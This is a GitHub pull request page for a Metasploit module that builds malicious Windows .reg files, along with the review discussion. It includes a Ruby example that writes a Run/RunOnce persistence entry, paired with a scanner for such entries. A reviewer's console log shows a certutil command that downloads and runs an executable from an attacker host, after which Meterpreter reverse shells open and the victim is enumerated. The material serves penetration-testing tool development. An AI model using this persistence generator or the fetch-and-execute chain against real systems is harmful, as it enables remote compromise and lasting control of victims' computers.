
Add Malicious Windows Registration Entries (.reg) File module #20384


Open: wants to merge 1 commit into master

Conversation

bcoles
Contributor

@bcoles bcoles commented Jul 13, 2025

This is unlikely to allow initial access without substantial social engineering efforts, as uncompressed .reg files are blocked by Outlook and Run[Once] keys are monitored, but a shell is a shell and it's not stupid if it works.
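As an added illustration of the file the PR description talks about (example code written for this page, not the module under review or any Metasploit code): the first half builds a .reg file that plants a command under the HKCU Run or RunOnce key, the second half scans such a file and reports exactly those entries, which is the kind of check that makes the Run[Once] keys "monitored". The value name, command and paths are constructed for the demo.

```ruby
# Added example, not code from this PR or from Metasploit: build the kind of
# .reg file the PR describes (a command planted under an HKCU Run/RunOnce key)
# and scan such a file for Run/RunOnce entries the way a monitoring rule would.
# The value name, command and paths used below are made up for the demo.

RUN_KEY_RE = %r{\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\z}i

# regedit treats backslash and double quote inside a quoted string as escapes,
# so both must be escaped or the imported value differs from what was intended.
def reg_escape(str)
  str.gsub(/[\\"]/) { |c| "\\#{c}" }
end

def reg_unescape(str)
  str.gsub(/\\(.)/) { $1 }
end

# Text of a .reg file that adds one REG_SZ value under <hive>\...\Run (or RunOnce).
# The format uses CRLF line endings and ends with a blank line.
def build_run_key_reg(value_name, command, hive: 'HKEY_CURRENT_USER', once: false)
  key = "#{hive}\\Software\\Microsoft\\Windows\\CurrentVersion\\#{once ? 'RunOnce' : 'Run'}"
  [
    'Windows Registry Editor Version 5.00',
    '',
    "[#{key}]",
    %("#{reg_escape(value_name)}"="#{reg_escape(command)}"),
    ''
  ].join("\r\n")
end

# "Version 5.00" files are normally written as UTF-16LE with a BOM (REGEDIT4
# files are ANSI). Return the on-disk bytes for the 5.00 header.
def reg_file_bytes(text)
  ("\uFEFF" + text).encode('UTF-16LE').b
end

# Undo the above so the scanner accepts either encoding.
def decode_reg(bytes)
  raw = bytes.b
  if raw.start_with?("\xFF\xFE".b)
    raw[2..].force_encoding('UTF-16LE').encode('UTF-8')
  else
    raw.force_encoding('UTF-8')
  end
end

# Walk the file, track the current [key] header and report every value written
# under a Run/RunOnce key as {key:, name:, command:}. Key deletions ([-HKEY...])
# and value deletions ("x"=-) are skipped because they add no persistence.
def find_autorun_entries(bytes)
  hits = []
  key = nil
  decode_reg(bytes).each_line do |line|
    line = line.strip
    if line.start_with?('[')
      key = line[1..-2]
      key = nil if key.start_with?('-')
      next
    end
    next if key.nil? || key !~ RUN_KEY_RE
    m = line.match(/\A(?:@|"((?:[^"\\]|\\.)*)")=(.*)\z/) or next
    name = m[1] ? reg_unescape(m[1]) : '(Default)'
    val = m[2]
    next if val == '-'
    # Only quoted REG_SZ values are decoded here; hex(2): / hex: forms are
    # reported verbatim rather than parsed.
    command = val =~ /\A"((?:[^"\\]|\\.)*)"\z/ ? reg_unescape($1) : val
    hits << { key: key, name: name, command: command }
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  payload = 'cmd.exe /c "C:\\Users\\Public\\update.exe"' # constructed sample command
  file = reg_file_bytes(build_run_key_reg('Updater', payload))
  puts "generated #{file.bytesize} bytes"
  find_autorun_entries(file).each { |h| puts "#{h[:key]} -> #{h[:name]} = #{h[:command]}" }
end
```

The scanner deliberately keys on the path suffix, so it catches both the HKCU and HKLM variants and both Run and RunOnce; a real detection would also cover the other autostart locations, but the point here is that a .reg file is plain text and trivially inspectable before it is ever imported.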

@bcoles bcoles added the module label Jul 13, 2025
@msutovsky-r7 msutovsky-r7 self-assigned this Jul 14, 2025
Contributor

@msutovsky-r7 msutovsky-r7 left a comment


Would it make sense to run the handler in the module rather than just drop the file?

msf6 exploit(multi/handler) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/g7dX6dKZEs4KZYEuEJH2KQ %TEMP%\NqMGWibK.exe & start /B %TEMP%\NqMGWibK.exe
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /g7dX6dKZEs4KZYEuEJH2KQ
[*] Started reverse TCP handler on 192.168.3.7:4444 
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.151
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.151 requested /g7dX6dKZEs4KZYEuEJH2KQ
[*] Sending payload to 10.5.132.151 (CertUtil URL Agent)
[*] Sending stage (203846 bytes) to 10.5.132.151
[*] Meterpreter session 2 opened (192.168.3.7:4444 -> 10.5.132.151:49681) at 2025-07-15 13:06:36 +0200

meterpreter > [*] Meterpreter session 3 opened (192.168.3.7:4444 -> 10.5.132.151:49684) at 2025-07-15 13:06:37 +0200

meterpreter > 
meterpreter > sysinfo
Computer        : WIN10_21H1_540C
OS              : Windows 10 21H1 (10.0 Build 19043).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10_21H1_540C\msfuser

@bcoles
Contributor Author

bcoles commented Jul 15, 2025

> Would it make sense to run the handler in the module rather than just drop the file?

Maybe. Maybe not. It could be hours or days before a session is received.

The existing approach is inconsistent, with about 40% of file format modules explicitly opting out of starting a handler:

# ls modules/exploits/windows/fileformat/ | wc -l
191
# grep -rni DisablePayloadHandler modules/exploits/windows/fileformat/ | grep true | wc -l
73
# grep -rni DisablePayloadHandler modules/exploits/windows/fileformat/ | grep false | wc -l
11
